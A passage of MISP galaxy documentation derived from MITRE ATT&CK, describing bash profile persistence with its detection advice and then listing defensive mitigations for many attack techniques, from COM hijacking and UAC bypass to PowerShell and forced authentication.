<p>&lt;code&gt;~/.bash_profile&lt;/code&gt; and &lt;code&gt;~/.bashrc&lt;/code&gt; are executed in a user&#8217;s context when a new shell opens or when a user logs in so that their environment is set correctly. &lt;code&gt;~/.bash_profile&lt;/code&gt; is executed for login shells and &lt;code&gt;~/.bashrc&lt;/code&gt; is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), &lt;code&gt;~/.bash_profile&lt;/code&gt; is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, &lt;code&gt;~/.bashrc&lt;/code&gt; is executed. This allows users more fine grained control over when they want certain commands executed.</p>
</div>
<div class="paragraph">
<p>Mac&#8217;s Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling &lt;code&gt;~/.bash_profile&lt;/code&gt; each time instead of &lt;code&gt;~/.bashrc&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>These files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell.</p>
</div>
<div class="paragraph">
<p>Detection: While users may customize their &lt;code&gt;~/.bashrc&lt;/code&gt; and &lt;code&gt;~/.bash_profile&lt;/code&gt; files , there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring, Process command-line parameters, Process use of network</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 909. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1156">https://attack.mitre.org/wiki/Technique/T1156</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_enterprise_attack_course_of_action"><a class="anchor" href="#_enterprise_attack_course_of_action"></a><a class="link" href="#_enterprise_attack_course_of_action">Enterprise Attack - Course of Action</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>ATT&amp;CK Mitigation.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Enterprise Attack - Course of Action is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/enterprise" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/enterprise</a> attack - course of action.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_component_object_model_hijacking_mitigation_t1122"><a class="anchor" href="#_component_object_model_hijacking_mitigation_t1122"></a><a class="link" href="#_component_object_model_hijacking_mitigation_t1122">Component Object Model Hijacking Mitigation - T1122</a></h3>
<div class="paragraph">
<p>Direct mitigation of this technique may not be recommended for a particular environment since COM objects are a legitimate part of the operating system and installed software. Blocking COM object changes may have unforeseen side effects to legitimate functionality.</p>
</div>
<div class="paragraph">
<p>Instead, identify and block potentially malicious software that may execute, or be executed by, this technique using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_exfiltration_over_command_and_control_channel_mitigation_t1041"><a class="anchor" href="#_exfiltration_over_command_and_control_channel_mitigation_t1041"></a><a class="link" href="#_exfiltration_over_command_and_control_channel_mitigation_t1041">Exfiltration Over Command and Control Channel Mitigation - T1041</a></h3>
<div class="paragraph">
<p>Mitigations for command and control apply. Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_process_injection_mitigation_t1055"><a class="anchor" href="#_process_injection_mitigation_t1055"></a><a class="link" href="#_process_injection_mitigation_t1055">Process Injection Mitigation - T1055</a></h3>
<div class="paragraph">
<p>This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific Windows API calls will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior. (Citation: GDSecurity Linux injection)</p>
</div>
<div class="paragraph">
<p>Identify or block potentially malicious software that may contain process injection functionality by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
<div class="paragraph">
<p>Utilize Yama (Citation: Linux kernel Yama) to mitigate ptrace based process injection by restricting the use of ptrace to privileged users only. Other mitigation controls involve the deployment of security kernel modules that provide advanced access control and process restrictions such as SELinux (Citation: SELinux official), grsecurity (Citation: grsecurity official), and AppAmour (Citation: AppArmor official).</p>
</div>
</div>
<div class="sect2">
<h3 id="_bypass_user_account_control_mitigation_t1088"><a class="anchor" href="#_bypass_user_account_control_mitigation_t1088"></a><a class="link" href="#_bypass_user_account_control_mitigation_t1088">Bypass User Account Control Mitigation - T1088</a></h3>
<div class="paragraph">
<p>Remove users from the local administrator group on systems. Although UAC bypass techniques exist, it is still prudent to use the highest enforcement level for UAC when possible and mitigate bypass opportunities that exist with techniques such as DLL Search Order Hijacking.</p>
</div>
<div class="paragraph">
<p>Check for common UAC bypass weaknesses on Windows systems to be aware of the risk posture and address issues where appropriate. (Citation: Github UACMe)</p>
</div>
</div>
<div class="sect2">
<h3 id="_command_line_interface_mitigation_t1059"><a class="anchor" href="#_command_line_interface_mitigation_t1059"></a><a class="link" href="#_command_line_interface_mitigation_t1059">Command-Line Interface Mitigation - T1059</a></h3>
<div class="paragraph">
<p>Audit and/or block command-line interpreters by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_dll_search_order_hijacking_mitigation_t1038"><a class="anchor" href="#_dll_search_order_hijacking_mitigation_t1038"></a><a class="link" href="#_dll_search_order_hijacking_mitigation_t1038">DLL Search Order Hijacking Mitigation - T1038</a></h3>
<div class="paragraph">
<p>Disallow loading of remote DLLs. (Citation: Microsoft DLL Preloading) This is included by default in Windows Server 2012+ and is available by patch for XP+ and Server 2003+. (Citation: Microsoft DLL Search) Path Algorithm</p>
</div>
<div class="paragraph">
<p>Enable Safe DLL Search Mode to force search for system DLLs in directories with greater restrictions (e.g. &lt;code&gt;%SYSTEMROOT%&lt;/code&gt;)to be used before local directory DLLs (e.g. a user&#8217;s home directory). The Safe DLL Search Mode can be enabled via Group Policy at Computer Configuration &gt; [Policies] &gt; Administrative Templates &gt; MSS (Legacy): MSS: (SafeDllSearchMode) Enable Safe DLL search mode. The associated Windows Registry key for this is located at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDLLSearchMode&lt;/code&gt; (Citation: Microsoft DLL Search)</p>
</div>
<div class="paragraph">
<p>Use auditing tools capable of detecting DLL search order hijacking opportunities on systems within an enterprise and correct them. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for DLL hijacking weaknesses. (Citation: Powersploit)</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through search order hijacking by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.</p>
</div>
</div>
<div class="sect2">
<h3 id="_uncommonly_used_port_mitigation_t1065"><a class="anchor" href="#_uncommonly_used_port_mitigation_t1065"></a><a class="link" href="#_uncommonly_used_port_mitigation_t1065">Uncommonly Used Port Mitigation - T1065</a></h3>
<div class="paragraph">
<p>Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports.</p>
</div>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_network_share_discovery_mitigation_t1135"><a class="anchor" href="#_network_share_discovery_mitigation_t1135"></a><a class="link" href="#_network_share_discovery_mitigation_t1135">Network Share Discovery Mitigation - T1135</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire network share information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_regsvcs_regasm_mitigation_t1121"><a class="anchor" href="#_regsvcs_regasm_mitigation_t1121"></a><a class="link" href="#_regsvcs_regasm_mitigation_t1121">Regsvcs/Regasm Mitigation - T1121</a></h3>
<div class="paragraph">
<p>Regsvcs and Regasm may not be necessary within a given environment. Block execution of Regsvcs.exe and Regasm.exe if they are not required for a given system or network to prevent potential misuess by adversaries.</p>
</div>
</div>
<div class="sect2">
<h3 id="_application_deployment_software_mitigation_t1017"><a class="anchor" href="#_application_deployment_software_mitigation_t1017"></a><a class="link" href="#_application_deployment_software_mitigation_t1017">Application Deployment Software Mitigation - T1017</a></h3>
<div class="paragraph">
<p>Grant access to application deployment systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multifactor authentication. Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network. Patch deployment systems regularly to prevent potential remote access through Exploitation of Vulnerability.</p>
</div>
<div class="paragraph">
<p>If the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.</p>
</div>
</div>
<div class="sect2">
<h3 id="_commonly_used_port_mitigation_t1043"><a class="anchor" href="#_commonly_used_port_mitigation_t1043"></a><a class="link" href="#_commonly_used_port_mitigation_t1043">Commonly Used Port Mitigation - T1043</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_windows_management_instrumentation_mitigation_t1047"><a class="anchor" href="#_windows_management_instrumentation_mitigation_t1047"></a><a class="link" href="#_windows_management_instrumentation_mitigation_t1047">Windows Management Instrumentation Mitigation - T1047</a></h3>
<div class="paragraph">
<p>Disabling WMI or RPCS may cause system instability and should be evaluated to assess the impact to a network. By default, only administrators are allowed to connect remotely using WMI. Restrict other users who are allowed to connect, or disallow all users to connect remotely to WMI. Prevent credential overlap across systems of administrator and privileged accounts. (Citation: FireEye WMI 2015)</p>
</div>
</div>
<div class="sect2">
<h3 id="_hooking_mitigation_t1179"><a class="anchor" href="#_hooking_mitigation_t1179"></a><a class="link" href="#_hooking_mitigation_t1179">Hooking Mitigation - T1179</a></h3>
<div class="paragraph">
<p>This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating all hooking will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.</p>
</div>
</div>
<div class="sect2">
<h3 id="_sudo_mitigation_t1169"><a class="anchor" href="#_sudo_mitigation_t1169"></a><a class="link" href="#_sudo_mitigation_t1169">Sudo Mitigation - T1169</a></h3>
<div class="paragraph">
<p>The sudoers file should be strictly edited such that passwords are always required and that users cant spawn risky processes as users with higher privilege. By requiring a password, even if an adversary can get terminal access, they must know the password to run anything in the sudoers file.</p>
</div>
</div>
<div class="sect2">
<h3 id="_distributed_component_object_model_mitigation_t1175"><a class="anchor" href="#_distributed_component_object_model_mitigation_t1175"></a><a class="link" href="#_distributed_component_object_model_mitigation_t1175">Distributed Component Object Model Mitigation - T1175</a></h3>
<div class="paragraph">
<p>Modify Registry settings (directly or using Dcomcnfg.exe) in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID{AppID_GUID}&lt;/code&gt; associated with the process-wide security of individual COM applications. (Citation: Microsoft Process Wide Com Keys)</p>
</div>
<div class="paragraph">
<p>Modify Registry settings (directly or using Dcomcnfg.exe) in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole&lt;/code&gt; associated with system-wide security defaults for all COM applications that do no set their own process-wide security. (Citation: Microsoft System Wide Com Keys) (Citation: Microsoft COM) ACL</p>
</div>
<div class="paragraph">
<p>Consider disabling DCOM through Dcomcnfg.exe. (Citation: Microsoft Disable DCOM)</p>
</div>
<div class="paragraph">
<p>Enable Windows firewall, which prevents DCOM instantiation by default.</p>
</div>
<div class="paragraph">
<p>Ensure all COM alerts and Protected View are enabled. (Citation: Microsoft Protected View)</p>
</div>
</div>
<div class="sect2">
<h3 id="_path_interception_mitigation_t1034"><a class="anchor" href="#_path_interception_mitigation_t1034"></a><a class="link" href="#_path_interception_mitigation_t1034">Path Interception Mitigation - T1034</a></h3>
<div class="paragraph">
<p>Eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them (Citation: Microsoft CreateProcess). Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate (Citation: MSDN DLL Security). Clean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries.</p>
</div>
<div class="paragraph">
<p>Periodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations (Citation: Kanthak Sentinel).</p>
</div>
<div class="paragraph">
<p>Require that all executables be placed in write-protected directories. Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory &lt;code&gt;C:&lt;/code&gt; and system directories, such as &lt;code&gt;C:\Windows\&lt;/code&gt;, to reduce places where malicious files could be placed for execution.</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through the path interception by using whitelisting (Citation: Beechey 2010) tools, like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies, (Citation: Corio 2008) that are capable of auditing and/or blocking unknown executables.</p>
</div>
</div>
<div class="sect2">
<h3 id="_graphical_user_interface_mitigation_t1061"><a class="anchor" href="#_graphical_user_interface_mitigation_t1061"></a><a class="link" href="#_graphical_user_interface_mitigation_t1061">Graphical User Interface Mitigation - T1061</a></h3>
<div class="paragraph">
<p>Prevent adversaries from gaining access to credentials through Credential Access that can be used to log into remote desktop sessions on systems.</p>
</div>
<div class="paragraph">
<p>Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to log into remote interactive sessions, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) and Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_ntfs_extended_attributes_mitigation_t1096"><a class="anchor" href="#_ntfs_extended_attributes_mitigation_t1096"></a><a class="link" href="#_ntfs_extended_attributes_mitigation_t1096">NTFS Extended Attributes Mitigation - T1096</a></h3>
<div class="paragraph">
<p>It may be difficult or inadvisable to block access to EA. Efforts should be focused on preventing potentially malicious software from running. Identify and block potentially malicious software that may contain functionality to hide information in EA by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_indicator_removal_from_tools_mitigation_t1066"><a class="anchor" href="#_indicator_removal_from_tools_mitigation_t1066"></a><a class="link" href="#_indicator_removal_from_tools_mitigation_t1066">Indicator Removal from Tools Mitigation - T1066</a></h3>
<div class="paragraph">
<p>Mitigation is difficult in instances like this because the adversary may have access to the system through another channel and can learn what techniques or tools are blocked by resident defenses. Exercising best practices with configuration and security as well as ensuring that proper process is followed during investigation of potential compromise is essential to detecting a larger intrusion through discrete alerts.</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be used by an adversary by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_re_opened_applications_mitigation_t1164"><a class="anchor" href="#_re_opened_applications_mitigation_t1164"></a><a class="link" href="#_re_opened_applications_mitigation_t1164">Re-opened Applications Mitigation - T1164</a></h3>
<div class="paragraph">
<p>Holding the Shift key while logging in prevents apps from opening automatically (Citation: Re-Open windows on Mac). This feature can be disabled entirely with the following terminal command: &lt;code&gt;defaults write -g ApplePersistence -bool no&lt;/code&gt;.</p>
</div>
</div>
<div class="sect2">
<h3 id="_launch_agent_mitigation_t1159"><a class="anchor" href="#_launch_agent_mitigation_t1159"></a><a class="link" href="#_launch_agent_mitigation_t1159">Launch Agent Mitigation - T1159</a></h3>
<div class="paragraph">
<p>Restrict user&#8217;s abilities to create Launch Agents with group policy.</p>
</div>
</div>
<div class="sect2">
<h3 id="_gatekeeper_bypass_mitigation_t1144"><a class="anchor" href="#_gatekeeper_bypass_mitigation_t1144"></a><a class="link" href="#_gatekeeper_bypass_mitigation_t1144">Gatekeeper Bypass Mitigation - T1144</a></h3>
<div class="paragraph">
<p>Other tools should be used to supplement Gatekeeper&#8217;s functionality. Additionally, system settings can prevent applications from running that haven&#8217;t been downloaded through the Apple Store which can help mitigate some of these issues.</p>
</div>
</div>
<div class="sect2">
<h3 id="_clipboard_data_mitigation_t1115"><a class="anchor" href="#_clipboard_data_mitigation_t1115"></a><a class="link" href="#_clipboard_data_mitigation_t1115">Clipboard Data Mitigation - T1115</a></h3>
<div class="paragraph">
<p>Instead of blocking software based on clipboard capture behavior, identify potentially malicious software that may contain this functionality, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_create_account_mitigation_t1136"><a class="anchor" href="#_create_account_mitigation_t1136"></a><a class="link" href="#_create_account_mitigation_t1136">Create Account Mitigation - T1136</a></h3>
<div class="paragraph">
<p>Use and enforce multifactor authentication. Follow guidelines to prevent or limit adversary access to Valid Accounts that may be used to create privileged accounts within an environment.</p>
</div>
<div class="paragraph">
<p>Adversaries that create local accounts on systems may have limited access within a network if access levels are properly locked down. These accounts may only be needed for persistence on individual systems and their usefulness depends on the utility of the system they reside on.</p>
</div>
<div class="paragraph">
<p>Protect domain controllers by ensuring proper security configuration for critical servers. Configure access controls and firewalls to limit access to these systems. Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.</p>
</div>
</div>
<div class="sect2">
<h3 id="_registry_run_keys_start_folder_mitigation_t1060"><a class="anchor" href="#_registry_run_keys_start_folder_mitigation_t1060"></a><a class="link" href="#_registry_run_keys_start_folder_mitigation_t1060">Registry Run Keys / Start Folder Mitigation - T1060</a></h3>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through run key or startup folder persistence using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_multi_stage_channels_mitigation_t1104"><a class="anchor" href="#_multi_stage_channels_mitigation_t1104"></a><a class="link" href="#_multi_stage_channels_mitigation_t1104">Multi-Stage Channels Mitigation - T1104</a></h3>
<div class="paragraph">
<p>Command and control infrastructure used in a multi-stage channel may be blocked if known ahead of time. If unique signatures are present in the C2 traffic, they could also be used as the basis of identifying and blocking the channel. (Citation: University of Birmingham C2)</p>
</div>
</div>
<div class="sect2">
<h3 id="_data_staged_mitigation_t1074"><a class="anchor" href="#_data_staged_mitigation_t1074"></a><a class="link" href="#_data_staged_mitigation_t1074">Data Staged Mitigation - T1074</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to collect data from removable media, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_launch_daemon_mitigation_t1160"><a class="anchor" href="#_launch_daemon_mitigation_t1160"></a><a class="link" href="#_launch_daemon_mitigation_t1160">Launch Daemon Mitigation - T1160</a></h3>
<div class="paragraph">
<p>Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new Launch Daemons.</p>
</div>
</div>
<div class="sect2">
<h3 id="_data_from_removable_media_mitigation_t1025"><a class="anchor" href="#_data_from_removable_media_mitigation_t1025"></a><a class="link" href="#_data_from_removable_media_mitigation_t1025">Data from Removable Media Mitigation - T1025</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to collect data from removable media, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_hidden_users_mitigation_t1147"><a class="anchor" href="#_hidden_users_mitigation_t1147"></a><a class="link" href="#_hidden_users_mitigation_t1147">Hidden Users Mitigation - T1147</a></h3>
<div class="paragraph">
<p>If the computer is domain joined, then group policy can help restrict the ability to create or hide users. Similarly, preventing the modification of the &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; &lt;code&gt;Hide500Users&lt;/code&gt; value will force all users to be visible.</p>
</div>
</div>
<div class="sect2">
<h3 id="_data_from_network_shared_drive_mitigation_t1039"><a class="anchor" href="#_data_from_network_shared_drive_mitigation_t1039"></a><a class="link" href="#_data_from_network_shared_drive_mitigation_t1039">Data from Network Shared Drive Mitigation - T1039</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to collect data from a network share, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_dylib_hijacking_mitigation_t1157"><a class="anchor" href="#_dylib_hijacking_mitigation_t1157"></a><a class="link" href="#_dylib_hijacking_mitigation_t1157">Dylib Hijacking Mitigation - T1157</a></h3>
<div class="paragraph">
<p>Prevent users from being able to write files to the search paths for applications, both in the folders where applications are run from and the standard dylib folders. If users can&#8217;t write to these directories, then they can&#8217;t intercept the search path.</p>
</div>
</div>
<div class="sect2">
<h3 id="_account_manipulation_mitigation_t1098"><a class="anchor" href="#_account_manipulation_mitigation_t1098"></a><a class="link" href="#_account_manipulation_mitigation_t1098">Account Manipulation Mitigation - T1098</a></h3>
<div class="paragraph">
<p>Use multifactor authentication. Follow guidelines to prevent or limit adversary access to Valid Accounts.</p>
</div>
<div class="paragraph">
<p>Protect domain controllers by ensuring proper security configuration for critical servers. Configure access controls and firewalls to limit access to these systems. Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.</p>
</div>
</div>
<div class="sect2">
<h3 id="_powershell_mitigation_t1086"><a class="anchor" href="#_powershell_mitigation_t1086"></a><a class="link" href="#_powershell_mitigation_t1086">PowerShell Mitigation - T1086</a></h3>
<div class="paragraph">
<p>It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions. When PowerShell is necessary, restrict PowerShell execution policy to administrators and to only execute signed scripts. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration. (Citation: Netspi PowerShell Execution Policy Bypass) Disable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.</p>
</div>
</div>
<div class="sect2">
<h3 id="_forced_authentication_mitigation_t1187"><a class="anchor" href="#_forced_authentication_mitigation_t1187"></a><a class="link" href="#_forced_authentication_mitigation_t1187">Forced Authentication Mitigation - T1187</a></h3>
<div class="paragraph">
<p>Block SMB traffic from exiting an enterprise network with egress filtering or by blocking TCP ports 139, 445 and UDP port 137. Filter or block WebDAV protocol traffic from exiting the network. If access to external resources over SMB and WebDAV is necessary, then traffic should be tightly limited with whitelisting. (Citation: US-CERT SMB Security) (Citation: US-CERT APT Energy Oct 2017)</p>
</div>
<div class="paragraph">
<p>For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.</p>
</div>
<div class="paragraph">
<p>Use strong passwords to increase the difficulty of credential hashes from being cracked if they are obtained.</p>
</div>
</div>
<div class="sect2">
<h3 id="_system_information_discovery_mitigation_t1082"><a class="anchor" href="#_system_information_discovery_mitigation_t1082"></a><a class="link" href="#_system_information_discovery_mitigation_t1082">System Information Discovery Mitigation - T1082</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about the operating system and underlying hardware, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_winlogon_helper_dll_mitigation_t1004"><a class="anchor" href="#_winlogon_helper_dll_mitigation_t1004"></a><a class="link" href="#_winlogon_helper_dll_mitigation_t1004">Winlogon Helper DLL Mitigation - T1004</a></h3>
<div class="paragraph">
<p>Upgrade the operating system to a newer version of Windows if using a version prior to Vista.</p>
</div>
<div class="paragraph">
<p>Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes.</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through the Winlogon helper process by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.</p>
</div>
</div>
<div class="sect2">
<h3 id="_password_filter_dll_mitigation_t1174"><a class="anchor" href="#_password_filter_dll_mitigation_t1174"></a><a class="link" href="#_password_filter_dll_mitigation_t1174">Password Filter DLL Mitigation - T1174</a></h3>
<div class="paragraph">
<p>Ensure only valid password filters are registered. Filter DLLs must be present in Windows installation directory (&lt;code&gt;C:\Windows\System32\&lt;/code&gt; by default) of a domain controller and/or local computer with a corresponding entry in &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages&lt;/code&gt;. (Citation: Microsoft Install Password Filter n.d)</p>
</div>
</div>
<div class="sect2">
<h3 id="_netsh_helper_dll_mitigation_t1128"><a class="anchor" href="#_netsh_helper_dll_mitigation_t1128"></a><a class="link" href="#_netsh_helper_dll_mitigation_t1128">Netsh Helper DLL Mitigation - T1128</a></h3>
<div class="paragraph">
<p>Identify and block potentially malicious software that may persist in this manner by using whitelisting (Citation: Beechey 2010) tools capable of monitoring DLL loads by Windows utilities like AppLocker. (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker)</p>
</div>
</div>
<div class="sect2">
<h3 id="_network_share_connection_removal_mitigation_t1126"><a class="anchor" href="#_network_share_connection_removal_mitigation_t1126"></a><a class="link" href="#_network_share_connection_removal_mitigation_t1126">Network Share Connection Removal Mitigation - T1126</a></h3>
<div class="paragraph">
<p>Follow best practices for mitigation of activity related to establishing Windows Admin Shares.</p>
</div>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to leverage network shares, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</p>
</div>
</div>
<div class="sect2">
<h3 id="_connection_proxy_mitigation_t1090"><a class="anchor" href="#_connection_proxy_mitigation_t1090"></a><a class="link" href="#_connection_proxy_mitigation_t1090">Connection Proxy Mitigation - T1090</a></h3>
<div class="paragraph">
